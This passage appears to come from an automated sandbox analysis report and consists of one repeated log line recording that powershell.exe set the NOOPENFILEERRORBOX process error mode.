                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
